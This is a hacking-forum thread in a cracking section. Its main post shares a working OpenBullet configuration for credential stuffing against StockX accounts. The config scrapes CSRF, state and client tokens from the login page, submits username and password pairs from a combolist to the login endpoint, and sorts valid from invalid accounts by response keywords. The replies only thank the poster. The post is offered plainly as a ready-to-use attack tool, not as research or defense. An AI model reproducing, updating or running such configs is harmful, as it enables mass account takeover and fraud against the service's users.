Skip to content
MPGHThe Dark Arts
/
RegisterLog in
Forum
Community
What's NewLatest posts across the boardTrendingHottest threads right nowSubscribedThreads you follow
Discussion
GeneralIntroductionsEntertainmentDebate FortFlaming & Rage
Board
News & AnnouncementsMPGH TimesSuggestions & HelpGiveaways
More Sections
Art & Graphic DesignProgrammingHackingCryptocurrency
Hacks & Cheats
Games
ValorantCS2 / CS:GOCall of Duty / WarzoneFortniteApex LegendsEscape From Tarkov
+14 moreLeague of LegendsGTA VMinecraftRustROTMGBattlefieldTroveBattleOnCombat ArmsCrossFireBlackshotRuneScapeDayZDead by Daylight
Resources
Game Hacking TutorialsReverse EngineeringGeneral Game HackingAnti-CheatConsole Game Hacking
Tools
Game Hacking ToolsTrainers & CheatsHack/Release NewsNew
Submit a release →Share your cheat, tool, or config with the community.
AINEW
AI Tools
General & DiscussionPrompt EngineeringLLM JailbreaksHotAI Agents & AutomationLocal / Open Models
AI × Gaming
AI Aimbots & VisionML Anti-CheatGame Bots & Automation
Create
AI Coding / Vibe CodingAI Art & MediaAI Voice & TTS
The AI frontier →Where game hacking meets modern machine learning. Jump in.
Marketplace
Buy & Sell
SellingBuyingTradingUser Services
Trust & Safety
Middleman LoungeMarketplace TalkVouch Copy Profiles
Money
Cryptocurrency TalkCurrency ExchangeWork & Job Offers
Start selling →List accounts, services, and goods. Use the middleman to trade safe.
MPGH The Dark Arts

A community for offensive security research, reverse engineering, and AI.

Community

ForumMarketplaceSearch

Account

RegisterLog in

Legal

Privacy PolicyForum RulesHelp & FAQ
© 2026 MPGH · All rights reserved.Built by the community, for the community. For educational purposes onlyContent is shared for security research and education — we don't condone illegal use. You're responsible for complying with applicable laws. Use at your own risk.
Home › Forum › Hacking › Cracking › Combolists / Configs › StockX OpenBullet Config

StockX OpenBullet Config

Posts 1–3 of 3 · Page 1 of 1
CI
citydrifter
StockX OpenBullet Config
Updated someone's expired config.
save this as .anom file extension.


Code:
[SETTINGS]
{
  "Name": "StockX",
  "SuggestedBots": 1,
  "MaxCPM": 0,
  "LastModified": "2020-03-10T20:16:31.9952645-07:00",
  "AdditionalInfo": "",
  "Author": "citydrifer",
  "Version": "1.4.1 [Anomaly]",
  "LoliSave": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "EncodeData": false,
  "AllowedWordlist1": "",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "Base64": "",
  "Grayscale": false,
  "RemoveLines": false,
  "RemoveNoise": false,
  "Dilate": false,
  "Threshold": 1.0,
  "DiffKeep": 0.0,
  "DiffHide": 0.0,
  "Saturate": false,
  "Saturation": 0.0,
  "Transparent": false,
  "OnlyShow": false,
  "ContrastGamma": false,
  "Contrast": 1.0,
  "Gamma": 1.0,
  "Brightness": 1.0,
  "RemoveLinesMin": 0,
  "RemoveLinesMax": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
#Request_Login_Page REQUEST GET "https://accounts.stock*****m/login" 
  
  HEADER "Host: accounts.stock*****m" 
  HEADER "Connection: keep-alive" 
  HEADER "Content-Length: 524" 
  HEADER "Sec-Fetch-Dest: empty" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36" 
  HEADER "Content-Type: application/json" 
  HEADER "Accept: */*" 
  HEADER "Origin: https://accounts.stock*****m" 
  HEADER "Sec-Fetch-Site: same-origin" 
  HEADER "Sec-Fetch-Mode: cors" 
  HEADER "Referer: https://accounts.stock*****m/login?state=g6Fo2SBtMVRTMWhhbWZqTG9oNVE5Tkx0RkRNbDFES2dkV0FGN6N0aWTZIGJVOE5ESGQwSjE2RldWRzhnMm5PdXZNLVY2NlFObTk4o2NpZNkgT1Z4cnQ0VkpxVHg3TElVS2Q2NjFXMER1Vk1wY0ZCeUQ&client=OVxrt4VJqTx7LIUKd661W0DuVMpcFByD&protocol=oauth2&prompt=login&audience=gateway.stock*****m&auth0Client=eyJuYW1lIjoiYXV0aDAuanMiLCJ2ZXJzaW9uIjoiOS4xMS4zIn0%3D&connection=production&redirect_uri=https%3A%2F%2Fstock*****m%2Fcallback%3Fpath%3D%2F&response_mode=query&response_type=code&scope=openid%20profile&stockx-default-tab=login&stockx-is-gdpr=false&stockx-language=en-us&stockx-session-id=b667b0e8-8dc4-486e-96d8-e3a79f8d9384&stockx-url=https%3A%2F%2Fstock*****m&stockx-user-agent=Mozilla%2F5.0%20(Windows%20NT%2010.0%3B%20Win64%3B%20x64)%20AppleWebKit%2F537.36%20(KHTML%2C%20like%20Gecko)%20Chrome%2F80.0.3987.132%20Safari%2F537.36&ui_locales=en&lng=en" 
  HEADER "Accept-Encoding: gzip, deflate, br" 
  HEADER "Accept-Language: en-US,en;q=0.9" 

#Parse_Csrf PARSE "<COOKIES>" LR "" "" -> VAR "CSRF" 

#Parse_State PARSE "<ADDRESS>" LR "state=" "&" -> VAR "STATE" 

#Parse_Client PARSE "<ADDRESS>" LR "client=" "&" -> VAR "CLIENTID" 

#Login REQUEST POST "https://accounts.stock*****m/usernamepassword/login" 
  CONTENT "{\"client_id\":\"<CLIENTID>\",\"redirect_uri\":\"https://stock*****m/callback?path=/\",\"tenant\":\"stockx-prod\",\"response_type\":\"code\",\"audience\":\"gateway.stock*****m\",\"_csrf\":\"<CSRF>\",\"state\":\"<STATE>\",\"_intstate\":\"deprecated\",\"username\":\"<USER>\",\"password\":\"<PASS>\",\"connection\":\"production\"}" 
  CONTENTTYPE "application/json" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

#Check_Result KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "Incorrect email or password" 
    KEY "{\"name\":\"Error\",\"message\":\"\",\"description\":\"Incorrect email or password.\",\"fromSandbox\":true}" 
  KEYCHAIN Success OR 
    KEY "wresult" 

#Parse_WRESULT PARSE "<SOURCE>" LR "  value=\"" "\">" -> VAR "WRESULT"
#1 · 6y ago
HA
hamid451
thans for saring this
#2 · 4y ago
RE
renn55
thxxxxxx man
#3 · 3y ago
Posts 1–3 of 3 · Page 1 of 1

Post a Reply

Similar Threads

  • Wish Config for OpenBulletBy niggo in Combolists / Configs
    0Last post 6y ago
  • Proxyless Spotify Config for OpenBulletBy niggo in Combolists / Configs
    3Last post 5y ago
  • Looking for a Pro Config!!!By ghostracerx in CounterStrike (CS) 1.6 Hacks / Counter Strike: Source (CSS) Hacks
    1Last post 16y ago
  • MP Config CommandsBy network59 in Call of Duty 4 - Modern Warfare (MW) Hacks
    0Last post 18y ago
  • [RS.COM]Awesome COD4 ConfigBy icuigorz in Call of Duty 4 - Modern Warfare (MW) Hacks
    6Last post 18y ago

Tags for this Thread

None